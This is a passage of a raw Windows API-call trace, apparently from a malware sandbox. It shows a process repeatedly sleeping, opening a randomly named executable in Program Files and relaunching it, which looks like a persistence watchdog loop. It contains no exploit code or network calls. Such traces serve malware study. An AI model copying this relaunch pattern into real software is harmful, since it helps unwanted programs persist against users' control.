HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.028] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0200.028] NtClose (Handle=0x1268) returned 0x0 [0200.030] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x13c0, hThread=0x1268, dwProcessId=0x4e4, dwThreadId=0xeac), hNewToken=0x0) returned 1 [0200.041] Sleep (dwMilliseconds=0x1388) [0200.043] Sleep (dwMilliseconds=0x1388) [0200.044] Sleep (dwMilliseconds=0x1388) [0200.046] Sleep (dwMilliseconds=0x1388) [0200.047] Sleep (dwMilliseconds=0x1388) [0200.049] Sleep (dwMilliseconds=0x1388) [0200.050] Sleep (dwMilliseconds=0x1388) [0200.052] Sleep (dwMilliseconds=0x1388) [0200.054] Sleep (dwMilliseconds=0x1388) [0200.055] Sleep (dwMilliseconds=0x1388) [0200.057] Sleep (dwMilliseconds=0x1388) [0200.058] Sleep (dwMilliseconds=0x1388) [0200.060] Sleep (dwMilliseconds=0x1388) [0200.062] Sleep (dwMilliseconds=0x1388) [0200.063] Sleep (dwMilliseconds=0x1388) [0200.065] Sleep (dwMilliseconds=0x1388) [0200.066] Sleep (dwMilliseconds=0x1388) [0200.068] Sleep (dwMilliseconds=0x1388) [0200.070] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.070] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1260, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.070] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.071] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65600) returned 1 [0200.071] NtQueryInformationFile (in: FileHandle=0x1260, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0200.071] NtClose (Handle=0x1260) returned 0x0 [0200.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.071] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1260, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.071] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.071] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0200.071] NtClose (Handle=0x1260) returned 0x0 [0200.073] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1264, hThread=0x1260, dwProcessId=0x868, dwThreadId=0x11b0), hNewToken=0x0) returned 1 [0200.085] Sleep (dwMilliseconds=0x1388) [0200.086] Sleep (dwMilliseconds=0x1388) [0200.088] Sleep (dwMilliseconds=0x1388) [0200.089] Sleep (dwMilliseconds=0x1388) [0200.091] Sleep (dwMilliseconds=0x1388) [0200.092] Sleep (dwMilliseconds=0x1388) [0200.094] Sleep (dwMilliseconds=0x1388) [0200.095] Sleep (dwMilliseconds=0x1388) [0200.097] Sleep (dwMilliseconds=0x1388) [0200.099] Sleep (dwMilliseconds=0x1388) [0200.100] Sleep (dwMilliseconds=0x1388) [0200.102] Sleep (dwMilliseconds=0x1388) [0200.103] Sleep (dwMilliseconds=0x1388) [0200.105] Sleep (dwMilliseconds=0x1388) [0200.106] Sleep (dwMilliseconds=0x1388) [0200.108] Sleep (dwMilliseconds=0x1388) [0200.109] Sleep (dwMilliseconds=0x1388) [0200.111] Sleep (dwMilliseconds=0x1388) [0200.112] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.112] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1278, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.112] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.113] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0200.113] NtQueryInformationFile (in: FileHandle=0x1278, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0200.113] NtClose (Handle=0x1278) returned 0x0 [0200.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.113] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1278, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.113] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.113] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0200.113] NtClose (Handle=0x1278) returned 0x0 [0200.116] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x125c, hThread=0x1278, dwProcessId=0x730, dwThreadId=0xec0), hNewToken=0x0) returned 1 [0200.136] Sleep (dwMilliseconds=0x1388) [0200.138] Sleep (dwMilliseconds=0x1388) [0200.139] Sleep (dwMilliseconds=0x1388) [0200.141] Sleep (dwMilliseconds=0x1388) [0200.142] Sleep (dwMilliseconds=0x1388) [0200.144] Sleep (dwMilliseconds=0x1388) [0200.146] Sleep (dwMilliseconds=0x1388) [0200.150] Sleep (dwMilliseconds=0x1388) [0200.152] Sleep (dwMilliseconds=0x1388) [0200.153] Sleep (dwMilliseconds=0x1388) [0200.155] Sleep (dwMilliseconds=0x1388) [0200.156] Sleep (dwMilliseconds=0x1388) [0200.158] Sleep (dwMilliseconds=0x1388) [0200.159] Sleep (dwMilliseconds=0x1388) [0200.161] Sleep (dwMilliseconds=0x1388) [0200.162] Sleep (dwMilliseconds=0x1388) [0200.166] Sleep (dwMilliseconds=0x1388) [0200.167] Sleep (dwMilliseconds=0x1388) [0200.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.169] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1270, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.169] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.169] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0200.169] NtQueryInformationFile (in: FileHandle=0x1270, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0200.169] NtClose (Handle=0x1270) returned 0x0 [0200.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.169] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1270, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.169] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.169] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0200.169] NtClose (Handle=0x1270) returned 0x0 [0200.172] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1274, hThread=0x1270, dwProcessId=0x1300, dwThreadId=0xc3c), hNewToken=0x0) returned 1 [0200.187] Sleep (dwMilliseconds=0x1388) [0200.188] Sleep (dwMilliseconds=0x1388) [0200.190] Sleep (dwMilliseconds=0x1388) [0200.191] Sleep (dwMilliseconds=0x1388) [0200.193] Sleep (dwMilliseconds=0x1388) [0200.194] Sleep (dwMilliseconds=0x1388) [0200.196] Sleep (dwMilliseconds=0x1388) [0200.197] Sleep (dwMilliseconds=0x1388) [0200.203] Sleep (dwMilliseconds=0x1388) [0200.205] Sleep (dwMilliseconds=0x1388) [0200.252] Sleep (dwMilliseconds=0x1388) [0200.253] Sleep (dwMilliseconds=0x1388) [0200.255] Sleep (dwMilliseconds=0x1388) [0200.257] Sleep (dwMilliseconds=0x1388) [0200.260] Sleep (dwMilliseconds=0x1388) [0200.262] Sleep (dwMilliseconds=0x1388) [0200.263] Sleep (dwMilliseconds=0x1388) [0200.267] Sleep (dwMilliseconds=0x1388) [0200.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.269] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1288, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.269] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.269] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0200.269] NtQueryInformationFile (in: FileHandle=0x1288, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0200.269] NtClose (Handle=0x1288) returned 0x0 [0200.270] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.270] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1288, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.270] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.270] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64880) returned 1 [0200.270] NtClose (Handle=0x1288) returned 0x0 [0200.272] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x126c, hThread=0x1288, dwProcessId=0xc50, dwThreadId=0x131c), hNewToken=0x0) returned 1 [0201.089] Sleep (dwMilliseconds=0x1388) [0201.140] Sleep (dwMilliseconds=0x1388) [0201.190] Sleep (dwMilliseconds=0x1388) [0201.192] Sleep (dwMilliseconds=0x1388) [0201.199] Sleep (dwMilliseconds=0x1388) [0201.201] Sleep (dwMilliseconds=0x1388) [0201.202] Sleep (dwMilliseconds=0x1388) [0201.204] Sleep (dwMilliseconds=0x1388) [0201.205] Sleep (dwMilliseconds=0x1388) [0201.207] Sleep (dwMilliseconds=0x1388) [0201.208] Sleep (dwMilliseconds=0x1388) [0201.210] Sleep (dwMilliseconds=0x1388) [0201.212] Sleep (dwMilliseconds=0x1388) [0201.215] Sleep (dwMilliseconds=0x1388) [0201.217] Sleep (dwMilliseconds=0x1388) [0201.218] Sleep (dwMilliseconds=0x1388) [0201.219] Sleep (dwMilliseconds=0x1388) [0201.221] Sleep (dwMilliseconds=0x1388) [0201.223] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.223] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1280, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.223] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.223] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0201.223] NtQueryInformationFile (in: FileHandle=0x1280, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.223] NtClose (Handle=0x1280) returned 0x0 [0201.223] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.223] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1280, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.223] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.223] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0201.223] NtClose (Handle=0x1280) returned 0x0 [0201.225] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1284, hThread=0x1280, dwProcessId=0xdb4, dwThreadId=0x624), hNewToken=0x0) returned 1 [0201.237] Sleep (dwMilliseconds=0x1388) [0201.239] Sleep (dwMilliseconds=0x1388) [0201.240] Sleep (dwMilliseconds=0x1388) [0201.241] Sleep (dwMilliseconds=0x1388) [0201.243] Sleep (dwMilliseconds=0x1388) [0201.247] Sleep (dwMilliseconds=0x1388) [0201.249] Sleep (dwMilliseconds=0x1388) [0201.250] Sleep (dwMilliseconds=0x1388) [0201.251] Sleep (dwMilliseconds=0x1388) [0201.253] Sleep (dwMilliseconds=0x1388) [0201.254] Sleep (dwMilliseconds=0x1388) [0201.256] Sleep (dwMilliseconds=0x1388) [0201.257] Sleep (dwMilliseconds=0x1388) [0201.259] Sleep (dwMilliseconds=0x1388) [0201.263] Sleep (dwMilliseconds=0x1388) [0201.264] Sleep (dwMilliseconds=0x1388) [0201.266] Sleep (dwMilliseconds=0x1388) [0201.267] Sleep (dwMilliseconds=0x1388) [0201.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.269] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x127c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.269] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.269] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64300) returned 1 [0201.269] NtQueryInformationFile (in: FileHandle=0x127c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.269] NtClose (Handle=0x127c) returned 0x0 [0201.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.269] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x127c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.269] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.270] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0201.270] NtClose (Handle=0x127c) returned 0x0 [0201.271] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: 